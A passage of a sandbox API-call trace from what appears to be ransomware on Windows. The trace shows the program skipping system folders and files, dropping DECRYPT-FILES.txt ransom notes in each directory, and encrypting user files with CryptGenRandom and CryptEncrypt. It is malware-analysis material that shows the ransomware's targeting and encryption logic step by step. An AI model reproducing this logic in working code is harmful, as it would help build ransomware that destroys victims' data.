Data\\Default\\Cache\\") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\All Users") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.178] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="AhnLab") returned 0x0 [0084.178] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.178] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0084.178] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.178] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\\\jkbimi8.tmp") returned 62 [0084.178] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0084.179] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0084.179] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.179] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\\\DECRYPT-FILES.txt") returned 68 [0084.179] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0084.181] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0084.182] CloseHandle (hObject=0x414) returned 1 [0084.182] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0084.182] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*" [0084.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0084.182] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.182] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.182] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.182] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.182] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f45e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.182] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.182] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.182] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0084.182] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0084.183] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0084.183] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0084.183] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0084.183] lstrcmpiW (lpString1="Favorites.vss", lpString2="DECRYPT-FILES.txt") returned 1 [0084.183] lstrcmpiW (lpString1="Favorites.vss", lpString2="autorun.inf") returned 1 [0084.183] lstrcmpiW (lpString1="Favorites.vss", lpString2="boot.ini") returned 1 [0084.183] lstrcmpiW (lpString1="Favorites.vss", lpString2="desktop.ini") returned 1 [0084.183] lstrcmpiW (lpString1="Favorites.vss", lpString2="ntuser.dat") returned -1 [0084.183] lstrcmpiW (lpString1="Favorites.vss", lpString2="iconcache.db") returned -1 [0084.183] lstrcmpiW (lpString1="Favorites.vss", lpString2="bootsect.bak") returned 1 [0084.183] lstrcmpiW (lpString1="Favorites.vss", lpString2="ntuser.dat.log") returned -1 [0084.183] lstrcmpiW (lpString1="Favorites.vss", lpString2="thumbs.db") returned -1 [0084.183] lstrcmpiW (lpString1="Favorites.vss", lpString2="Bootfont.bin") returned 1 [0084.183] lstrlenW (lpString="Favorites.vss") returned 13 [0084.183] lstrcmpiW (lpString1="vss", lpString2="lnk") returned 1 [0084.183] lstrcmpiW (lpString1="vss", lpString2="exe") returned 1 [0084.183] lstrcmpiW (lpString1="vss", lpString2="sys") returned 1 [0084.183] lstrcmpiW (lpString1="vss", lpString2="dll") returned 1 [0084.183] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0084.183] lstrlenW (lpString="Favorites.vss") returned 13 [0084.183] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0084.183] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="Favorites.vss" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" [0084.183] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.184] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=0) returned 1 [0084.184] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0084.184] CloseHandle (hObject=0x0) returned 0 [0084.184] CloseHandle (hObject=0x428) returned 1 [0084.184] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.185] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f45e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.185] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.185] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.185] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.185] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.185] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.185] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.185] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.185] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.185] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.185] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.185] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.185] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.185] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.185] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.185] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.185] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0084.185] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.185] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0084.185] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\jkbimi8.tmp" [0084.185] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.185] CloseHandle (hObject=0x0) returned 0 [0084.186] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.186] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0084.186] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0084.186] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0084.186] lstrcatW (in: lpString1="_private", lpString2="\\" | out: lpString1="_private\\") returned="_private\\" [0084.186] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="_private\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\Program Files") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch=":\\Windows") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\Games\\") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\All Users") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="AhnLab") returned 0x0 [0084.186] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.186] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0084.186] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.186] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\\\jkbimi8.tmp") returned 71 [0084.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x428 [0084.188] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0084.188] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.188] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\\\DECRYPT-FILES.txt") returned 77 [0084.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0084.189] WriteFile (in: hFile=0x42c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0084.190] CloseHandle (hObject=0x42c) returned 1 [0084.190] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0084.190] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*" [0084.190] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b18 [0084.190] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.190] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.190] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.190] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.190] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f45e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae61a740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.190] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.190] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0084.190] lstrcmpiW (lpString1="folder.ico", lpString2="DECRYPT-FILES.txt") returned 1 [0084.190] lstrcmpiW (lpString1="folder.ico", lpString2="autorun.inf") returned 1 [0084.190] lstrcmpiW (lpString1="folder.ico", lpString2="boot.ini") returned 1 [0084.190] lstrcmpiW (lpString1="folder.ico", lpString2="desktop.ini") returned 1 [0084.190] lstrcmpiW (lpString1="folder.ico", lpString2="ntuser.dat") returned -1 [0084.190] lstrcmpiW (lpString1="folder.ico", lpString2="iconcache.db") returned -1 [0084.190] lstrcmpiW (lpString1="folder.ico", lpString2="bootsect.bak") returned 1 [0084.190] lstrcmpiW (lpString1="folder.ico", lpString2="ntuser.dat.log") returned -1 [0084.190] lstrcmpiW (lpString1="folder.ico", lpString2="thumbs.db") returned -1 [0084.191] lstrcmpiW (lpString1="folder.ico", lpString2="Bootfont.bin") returned 1 [0084.191] lstrlenW (lpString="folder.ico") returned 10 [0084.191] lstrcmpiW (lpString1="ico", lpString2="lnk") returned -1 [0084.191] lstrcmpiW (lpString1="ico", lpString2="exe") returned 1 [0084.191] lstrcmpiW (lpString1="ico", lpString2="sys") returned -1 [0084.191] lstrcmpiW (lpString1="ico", lpString2="dll") returned 1 [0084.191] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0084.191] lstrlenW (lpString="folder.ico") returned 10 [0084.191] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0084.191] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="folder.ico" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" [0084.191] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.191] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.192] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=29926) returned 1 [0084.192] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.192] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.195] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.195] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.195] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.197] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.197] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.198] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.198] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.199] CloseHandle (hObject=0x43c) returned 1 [0084.199] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.199] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.199] CloseHandle (hObject=0x0) returned 0 [0084.199] CloseHandle (hObject=0x438) returned 1 [0084.200] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.200] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.200] GetTickCount () returned 0x114d836 [0084.200] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.200] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.200] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.201] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.201] lstrlenA (lpString="kernel32.dll") returned 12 [0084.201] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.201] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.201] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.201] 